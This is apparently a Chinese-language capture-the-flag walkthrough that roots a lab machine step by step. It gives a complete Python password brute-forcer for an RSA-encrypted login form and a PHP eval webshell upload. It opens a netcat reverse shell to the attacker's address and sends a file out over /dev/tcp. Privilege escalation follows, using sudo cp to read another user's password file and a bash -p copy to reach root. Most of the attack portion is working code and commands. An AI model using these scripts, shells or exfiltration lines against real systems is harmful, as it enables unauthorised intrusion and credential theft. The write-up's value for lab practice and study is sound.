正文1、端口扫描2、web登录页面用户密码爆破3、文件上传漏洞利用4、nc 反弹5、Linux用户检索与特权分析6、图片隐写7、解密与格式转换8、cp命令横向获取用户密码9、diff命令进行文件比较正文kali攻击机地址192.168.1.4靶场地址192.168.1.151、端口扫描在kali里使用nmap工具nmap-sV-v-T4-A192.168.1.15发现80和22端口开放访问网页2、web登录页面用户密码爆破抓包发现不填验证码输入用户名和密码也能返回“无效的用户名和密码”编写密码爆破脚本1.py:importrequestsimportrandomimportsysfromCrypto.PublicKeyimportRSAfromCrypto.CipherimportPKCS1_v1_5frombase64importb64encodefromtypingimportOptional,Dict# 全局会话复用连接sessionrequests.Session()# 设置全局请求超时秒TIMEOUT10# 目标登录URLLOGIN_URLhttp://192.168.1.15/login.php# RSA公钥去除多余缩进避免解析失败PUBLIC_KEY-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtLlBu4KjqP4t7Bc6bf/2 1TrHJbKl5iGfAlxn/c1WxbjhA/BRoQNpGX78oROMarMDJnS2ddJBtpdAnovE3o NX45Eb1eTH9Isis/3mIXgVhuQ0Fhi11eo82hFQRXZOolJwfGqm7lL4r6OQJ96zur IodiC2uxcmR/YDjrhZhMlUYG2/OTm1bROEg1FV9gARh27SA4/VLbBsst69wS8Wj m5fPQGd31QBN/8UvwyT/QCTpQdxV3PARXORVsdYLDiNSrwwO/cq6gNwthLxhbS he40vUae0GtJjpkD5xJhkRXGuoj/D3/cd4KytNeiGezIeLQrAER6kf6B8vHoPfk eQIDAQAB -----END PUBLIC KEY-----defencrypt_password(password:str)-Optional[str]: RSA加密密码兼容前端JSEncrypt的PKCS1_v1_5填充 :param password: 原始密码字符串 :return: 加密后的base64字符串失败返回None try:rsa_keyRSA.importKey(PUBLIC_KEY)cipherPKCS1_v1_5.new(rsa_key)# 加密需编码为bytesencrypted_bytescipher.encrypt(password.encode(utf-8))# base64编码并转回字符串returnb64encode(encrypted_bytes).decode(utf-8)exceptExceptionase:print(f[!] 密码加密失败{e}| 密码{password})returnNonedeflogin(username:str,password:str)-Optional[Dict]: 发送登录请求 :param username: 用户名 :param password: 原始密码 :return: 登录响应的JSON数据失败返回None # 加密密码enc_passwordencrypt_password(password)ifnotenc_password:returnNone# 登录请求参数data{username:username,password:enc_password,captcha:# 若目标需验证码需补充验证码识别/输入逻辑}try:# 发送POST请求JSON格式responsesession.post(urlLOGIN_URL,jsondata,timeoutTIMEOUT,headers{User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36,Content-Type:application/json})# 检查响应状态码response.raise_for_status()returnresponse.json()exceptrequests.exceptions.Timeout:print(f[!] 登录请求超时{TIMEOUT}秒 | 密码{password})exceptrequests.exceptions.ConnectionError:print(f[!] 目标服务器连接失败 | 密码{password})exceptrequests.exceptions.HTTPErrorase:print(f[!] HTTP请求错误{e}| 密码{password})exceptExceptionase:print(f[!] 登录请求异常{e}| 密码{password})returnNonedefbrute_force_login(username:str,pass_file_path:str)-None: 密码爆破主逻辑 :param username: 目标用户名 :param pass_file_path: 密码字典文件路径 # 读取密码字典try:withopen(pass_file_path,r,encodingutf-8)asf:passwords[line.strip()forlineinfifline.strip()]exceptFileNotFoundError:print(f[!] 密码文件不存在{pass_file_path})sys.exit(1)exceptPermissionError:print(f[!] 无权限读取密码文件{pass_file_path})sys.exit(1)exceptExceptionase:print(f[!] 读取密码文件异常{e})sys.exit(1)totallen(passwords)iftotal0:print([!] 密码字典为空)sys.exit(1)print(f[*] 开始密码爆破 | 用户名{username}| 密码总数{total})print(-*50)# 遍历密码爆破foridx,passwordinenumerate(passwords,1):print(f[{idx}/{total}] 尝试密码{password},end )resultlogin(username,password)ifnotresult:print(→ 请求失败)continue# 登录成功判断根据实际响应调整success字段ifresult.get(success):print(\n*50)print(f[] 爆破成功用户名{username}| 密码{password})print(*50)# 可在此处添加后续操作如访问后台、保存结果等sys.exit(0)else:error_msgresult.get(error,未知错误)print(f→ 登录失败{error_msg})# 爆破完成未找到密码print(-*50)print([!] 密码爆破完成未找到有效密码)if__name____main__:# 命令行参数校验用法python 1.py 用户名 密码字典路径iflen(sys.argv)!3:print(用法python {} 用户名 密码字典文件路径.format(sys.argv[0]))print(示例python {} admin pass.txt.format(sys.argv[0]))sys.exit(1)# 获取命令行参数target_usernamesys.argv[1]target_pass_filesys.argv[2]# 执行爆破brute_force_login(target_username,target_pass_file)拿到admin用户密码justine3、文件上传漏洞利用登录进去后是个文件上传目录扫描能扫出来文件上传的路径dirsearch-u192.168.1.15上传一句话木马文件到/uploads/目录下?php eval($_POST[x]);?4、nc 反弹蚁键右键打开终端输入busyboxnc192.168.1.44444-e/bin/bashkail记得开启4444端口监听nc-lp4444kali调整bash格式/usr/bin/script-qc/bin/bash /dev/null CTRLZ stty raw -echo;fgreset xterm5、Linux用户检索与特权分析回到家目录发现两个用户ihatemath和ilovelinux从根目录开始查找所有 “所属用户组是 ihatemath”、 “所属用户组是 ilovelinux” 的文件或目录同时忽略查找过程中出现的权限不足、文件不存在等错误提示find/-groupihatemath2/dev/nullfind/-groupilovelinux2/dev/null将本地/var/local/images.jpg文件内容通过TCP协议发送到 IP 为 192.168.1.4、端口为 1234 的远程主机上。cat/var/local/images.jpg/dev/tcp/192.168.1.4/1234kail配置nc-lvp1234images.jpg# 用nc监听接收数据并写入文件# 若无nc也可通过bash监听cat received_images.jpg /dev/tcp/0.0.0.0/12346、图片隐写查看图片隐藏属性exiftool images.jpg发现摩斯码7、解密与格式转换解码后发现还要转HEX:转换后拿到ilovelinux用户的hash密码48415050595f445241474f4e5f424f41545f464553544956414csshilovelinux192.168.1.15#然后输入密码查看ilovelinux用户的特权操作输出内容含义Matching Defaults entries for ilovelinux on cp520:开始展示ilovelinux用户在cp520主机上的 sudo 默认配置env_reset, mail_badpass, secure_path...sudo 默认配置项-env_reset执行 sudo 命令时重置环境变量保证安全-mail_badpass密码错误时发送邮件提醒通常给 root-secure_pathsudo 执行命令时的默认 PATH 路径限定命令查找范围防止恶意脚本User ilovelinux may run the following commands on cp520:核心结果明确ilovelinux用户在cp520主机上可执行的 sudo 命令(ihatemath) /bin/cp授权详情最关键-(ihatemath)可切换到ihatemath用户身份执行括号内是允许切换的用户若为(ALL)则可切换到任意用户-/bin/cp仅允许执行/bin/cp命令Linux 系统的文件复制命令8、cp命令横向获取用户密码那就执行复制命令拿到ihatemath用户的口令3c5611f0ae3ftouch/tmp/achmod777/tmp/als-l/tmp/asudo-uihatemath /bin/cp /opt/ihatemath.pass /tmp/acat/tmp/a命令 / 输出内容含义与核心目的touch /tmp/a核心操作在/tmp目录创建空文件a。✨ 目的为后续复制敏感文件内容做 “载体”/tmp是所有用户可读写的公共目录。chmod 777 /tmp/a核心操作修改/tmp/a的权限为777所有用户可读、可写、可执行。✨ 目的确保ihatemath用户后续执行cp的身份能向这个文件写入内容避免权限不足。ls -l /tmp/a验证操作查看/tmp/a的权限和属性。输出解读--rwxrwxrwx权限为 777所有人可读写执行-1 ilovelinux ilovelinux文件属主 / 属组是ilovelinux-0文件大小为 0空文件✨ 目的确认权限修改成功为后续复制铺路。sudo -u ihatemath /bin/cp /opt/ihatemath.pass /tmp/a核心利用以ihatemath用户身份执行授权的/bin/cp命令将/opt/ihatemath.passilovelinux无权限直接读取的敏感文件复制到/tmp/a。✨ 关键ilovelinux本身读不了/opt/ihatemath.pass但能通过sudo切换到ihatemath执行cp间接获取文件内容。cat /tmp/a读取结果查看/tmp/a的内容输出3c5611f0ae3f大概率是ihatemath的密码哈希 / 明文密码。✨ 目的通过可读写的/tmp/a拿到原本无权限访问的敏感文件内容。su -成功切换到ihatemath用户查看ihatemath用户的特权操作并执行9、diff命令进行文件比较通过以下命令拿到root目录下的flagdiffwhatsthis /bin/bash ./whatsthis-pcd/root命令 / 输出内容含义与核心目的diff whatsthis /bin/bashdiff命令对比whatsthis和系统原生/bin/bash。✨ 无任何输出说明两个文件二进制内容完全一致whatsthis是bash的完整副本。./whatsthis -p执行当前目录下的whatsthis文件并传入-p参数。✨-p是bash的特权模式参数作用是即使进程的有效用户 IDEUID与实际用户 IDUID不一致也不重置环境变量、不降低权限保留特权。cd /ro执行./whatsthis -p后提示符从$变成了#说明你已经获得了root 权限#是 root 用户的提示符。后面的cd /ro是输入到一半的命令大概率是cd /root切换到 root 家目录。